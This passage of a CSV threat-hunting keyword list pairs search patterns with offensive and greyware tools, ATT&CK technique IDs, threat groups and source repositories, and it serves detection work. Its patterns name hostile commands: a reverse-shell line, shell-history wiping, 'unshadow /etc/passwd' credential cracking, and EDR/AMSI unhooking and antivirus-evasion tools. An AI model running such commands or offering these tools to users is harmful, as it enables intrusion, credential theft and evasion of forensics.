These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*UmVmbGVjdGl2ZSBETEwgaW5qZWN0aW9u*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*UmVmbGVjdGl2ZSBETEwgT1NTIEJ1Y2tldA==*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*UmVmbGVjdGl2ZSBETEwgUGF0aA==*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*UmVmbGVjdGl2ZSBETEwgVVJJ*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*UmVmbGVjdGl2ZSBJbmplY3QgUHJvY2VzcyBJZA==*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*Un1k0d3r/SCShell*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z
-*uname -a* w* id* /bin/bash -i*,greyware_tool_keyword,shell,Reverse Shell Command Line,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml,1,0,greyware tool - risks of False positive !,N/A,10,6749,1943,2023-10-03T04:55:17Z,2016-12-24T09:48:49Z
-*uname=FUZZ&pass=FUZZ*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z
-*Unblock-File .\install.ps1*,offensive_tool_keyword,commando-vm,CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.,T1059 - T1053 - T1055 - T1070,TA0002 - TA0004 - TA0008,N/A,N/A,Exploitation OS,https://github.com/mandiant/commando-vm,1,0,N/A,N/A,10,6323,1248,2023-10-03T19:02:49Z,2019-03-26T22:36:32Z
-*Unconstrained_Delegation_Systems.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z
-*Und3rf10w*,offensive_tool_keyword,Github Username,github repo hosting offensive tools and exploitation frameworks,N/A,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Und3rf10w,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*unDefender-master*,offensive_tool_keyword,unDefender,Killing your preferred antimalware by abusing native symbolic links and NT paths.,T1562.001 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense 
Evasion,https://github.com/APTortellini/unDefender,1,1,N/A,10,4,309,78,2022-01-29T12:35:31Z,2021-08-21T14:45:39Z
-*undertheradar-main*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,1,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z
-*unexpected bytes remain after decoding*,greyware_tool_keyword,ssh,Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z
-*unexpected internal error*,greyware_tool_keyword,ssh,Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z
-*unhide-implant*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z
-*unhook 
kernel32*,offensive_tool_keyword,C2 related tools,Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ThreadStackSpoofer,1,0,N/A,10,10,875,158,2022-06-17T18:06:35Z,2021-09-26T22:48:17Z -*unhook wldp amsi*,offensive_tool_keyword,C2 related tools,Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040,N/A,N/A,C2,https://github.com/mgeeky/ThreadStackSpoofer,1,0,N/A,10,10,875,158,2022-06-17T18:06:35Z,2021-09-26T22:48:17Z -*UnhookingKnownDlls.*,offensive_tool_keyword,ntdlll-unhooking-collection,unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless),T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/ntdlll-unhooking-collection,1,1,N/A,9,2,152,34,2023-08-02T02:26:33Z,2023-02-07T16:54:15Z -*UnhookingNtdll_disk.*,offensive_tool_keyword,ntdlll-unhooking-collection,unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless),T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/ntdlll-unhooking-collection,1,1,N/A,9,2,152,34,2023-08-02T02:26:33Z,2023-02-07T16:54:15Z -*UnhookingPatch-main*,offensive_tool_keyword,UnhookingPatch,Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime,T1055 - T1055.001 - T1070 - T1070.004 - T1211,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/UnhookingPatch,1,1,N/A,9,3,259,43,2023-08-02T02:25:38Z,2023-02-08T16:21:03Z -*UniByAv*,offensive_tool_keyword,UniByAv,UniByAv is a simple obfuscator that take raw shellcode and generate executable that are Anti-Virus friendly. The obfuscation routine is purely writtend in assembly to remain pretty short and efficient. 
In a nutshell the application generate a 32 bits xor key and brute force the key at run time then perform the decryption of the actually shellcode.,T1027 - T1059 - T1029,TA0002 - TA0003 - TA0007,N/A,N/A,Defense Evasion,https://github.com/Mr-Un1k0d3r/UniByAv,1,1,N/A,N/A,3,239,67,2018-10-26T15:25:26Z,2017-08-15T21:57:15Z -*unicorn.py *,offensive_tool_keyword,unicorn,Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory,T1059.001 - T1055.012 - T1027.002 - T1547.009,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/trustedsec/unicorn,1,0,N/A,N/A,10,3503,839,2023-09-15T05:43:27Z,2013-06-19T08:38:06Z -*unicorn-master.zip*,offensive_tool_keyword,unicorn,Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory,T1059.001 - T1055.012 - T1027.002 - T1547.009,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/trustedsec/unicorn,1,1,N/A,N/A,10,3503,839,2023-09-15T05:43:27Z,2013-06-19T08:38:06Z -*unixpickle*,offensive_tool_keyword,Github Username,github repo hosting obfuscation tools,N/A,N/A,N/A,N/A,Defense Evasion,https://github.com/unixpickle,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*unknown or unsupported key type*,greyware_tool_keyword,ssh,Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z -*unkvolism/Fuck-Etw*,offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,1,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*unmanagedPowershell */command*,offensive_tool_keyword,HardHatC2,A C# 
Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,0,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*unmarshal_cmd_exec.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*UnmarshalPwn.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*UnmarshalPwn.exe*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*unode/firefox_decrypt*,offensive_tool_keyword,firefox_decrypt,Firefox Decrypt is a tool to extract passwords from Mozilla,T1555.003 - T1112 - T1056.001,TA0006 - TA0009 - TA0040,N/A,N/A,Credential Access,https://github.com/unode/firefox_decrypt,1,1,N/A,10,10,1622,283,2023-07-28T15:10:13Z,2014-01-17T13:25:02Z -*UnquotedPath.csproj*,offensive_tool_keyword,UnquotedPath,Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into,T1543.003 - T1036.005 - T1057,TA0007 - TA0003,N/A,N/A,Discovery,https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*UnquotedPath.exe*,offensive_tool_keyword,UnquotedPath,Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into,T1543.003 - T1036.005 - T1057,TA0007 - TA0003,N/A,N/A,Discovery,https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE*,greyware_tool_keyword,unset,disable history logging,T1056.001 - T1562.001,TA0004 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*unset HISTFILE*,greyware_tool_keyword,bash,Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.,T1070.004 - 
T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*unset HISTFILE*,greyware_tool_keyword,unset,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*unshackle --*,offensive_tool_keyword,unshackle,Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux,T1110.004 - T1059.004 - T1070.004,TA0006 - TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Fadi002/unshackle,1,0,N/A,10,10,1482,83,2023-09-23T15:54:14Z,2023-07-19T22:30:28Z -*unshackle-main*,offensive_tool_keyword,unshackle,Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux,T1110.004 - T1059.004 - T1070.004,TA0006 - TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Fadi002/unshackle,1,1,N/A,10,10,1482,83,2023-09-23T15:54:14Z,2023-07-19T22:30:28Z -*unshackle-v1.0.iso*,offensive_tool_keyword,unshackle,Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux,T1110.004 - T1059.004 - T1070.004,TA0006 - TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Fadi002/unshackle,1,1,N/A,10,10,1482,83,2023-09-23T15:54:14Z,2023-07-19T22:30:28Z -*unshadow /etc/passwd*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*unshadow 
passwd shadow > *,greyware_tool_keyword,unshadow,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*unshadow passwd shadow*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*untested_payloads.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*UnwindInspector.exe*,offensive_tool_keyword,SilentMoonwalk,PoC Implementation of a fully dynamic call stack spoofer,T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/SilentMoonwalk,1,1,N/A,9,6,507,84,2022-12-08T10:01:41Z,2022-12-04T13:30:33Z -*Update-ExeFunctions*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - 